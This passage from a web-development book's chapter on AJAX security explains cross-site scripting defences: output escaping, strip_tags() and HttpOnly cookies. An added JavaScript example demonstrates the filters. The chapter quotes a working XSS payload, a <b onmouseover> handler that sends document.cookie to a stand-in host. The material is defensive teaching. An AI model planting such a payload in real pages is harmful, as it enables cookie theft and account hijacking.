AJAX - The Complete Reference

PART II


Chapter 7: Security Concerns 315


So now, you must either disallow links or try to filter out those that start with javascript:.
However, anyone with a decent understanding of XHTML and JavaScript can bury script code
in just about any tag, including the harmless <b> tag, as shown here.

<b onmouseover="var cookieMonster = new Image(); cookieMonster.src=
'http://www.evilsite.com/cookiecollecter.php?stolencookie=
'+escape(document.cookie);">Hope you don’t roll over this!</b>

To thoroughly address this, a variety of attributes, tags, and URL forms must be
removed. Hopefully, now everything is addressed. You can see examples to play with at the
book site that show the insecure blog being patched in various ways. However, hackers can
be wily and come up with all sorts of modifications to their XSS attacks that may circumvent
filters that remove or replace specified tag content. A far superior way is to simply convert all
the tags posted into HTML entities. For example, < becomes &lt; and > becomes &gt;. This
idea is called escaping the output. You also might simply remove all the tags in a post. Many
environments provide very easy methods for performing this task. For example, in PHP you
could use the strip_tags() function. A final blog version has been made safe from XSS
exploits using this technique, found at http://ajaxref.com/ch7/secureblog.php. As shown in
Figure 7-10, it is clear that some have come and tried to put some scripts in place, but they
didn’t work.

HTTP-Only Cookies
As previously mentioned, cross-site scripting attacks often aim to steal a cookie in an
attempt to gain unauthorized access to a site or application. XSS becomes quite a useful
technique to a hacker since JavaScript can reference cookie values via document.cookie
and a script may send the values found there using a traditional JavaScript communication
method such as the image, iframe, or <script> tag approach. However, quite often
accessing a cookie client-side is not even needed, and it is quite possible to keep JavaScript
from accessing the cookie value by setting the HttpOnly flag in our Set-Cookie
response header.
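As an added example (not code from the book or from ajaxref.com, and in JavaScript rather than the chapter's PHP), the following contrasts the link-only filter the text warns against with escaping the output and stripping tags, using the <b onmouseover> post shown above as constructed input, and builds the Set-Cookie header with the HttpOnly flag described in the paragraph above. The function names, regular expressions and the cookie name sid are assumptions of this example.

```javascript
// Added example: the two defences this chapter describes, run against the
// chapter's own <b onmouseover=...> post (constructed here as a string).
const SAMPLE_POST =
  '<b onmouseover="var cookieMonster = new Image(); cookieMonster.src=' +
  "'http://www.evilsite.com/cookiecollecter.php?stolencookie='" +
  '+escape(document.cookie);">Hope you don\'t roll over this!</b>';

// The chapter's first attempt: only remove href="javascript:..." links.
// It leaves the event-handler attribute untouched, so it is not a fix.
function naiveLinkFilter(post) {
  return post.replace(/href\s*=\s*(["']?)\s*javascript:[^"'\s>]*\1/gi, '');
}

// Escaping the output: every character that can open markup becomes an
// entity, so the browser shows the text literally instead of parsing tags.
function escapeHtml(text) {
  const entities = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return text.replace(/[&<>"']/g, (ch) => entities[ch]);
}

// The chapter's other option: drop the tags entirely, as PHP strip_tags() does.
// Assumption: a single regex is enough for this demonstration's input.
function stripTags(text) {
  return text.replace(/<[^>]*>/g, '');
}

// Check used below: did anything survive that a browser would parse as a tag?
function containsMarkup(text) {
  return /<[a-z!\/]/i.test(text);
}

// Set-Cookie header for the session with HttpOnly, so document.cookie
// cannot read it even if a script does get injected. sessionId is constructed.
function sessionCookieHeader(sessionId) {
  return `sid=${encodeURIComponent(sessionId)}; Path=/; HttpOnly`;
}

console.log('after link filter, markup left:', containsMarkup(naiveLinkFilter(SAMPLE_POST)));
console.log('after escaping, markup left:   ', containsMarkup(escapeHtml(SAMPLE_POST)));
console.log('after strip_tags:              ', stripTags(SAMPLE_POST));
console.log('header:', sessionCookieHeader('constructed-session-id'));
```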

As of the time of this edition’s writing, only Internet Explorer 6+ and Firefox 3+ support
HttpOnly cookies. You can verify the activity of your browser using the example at
http://ajaxref.com/ch7/cookie.html.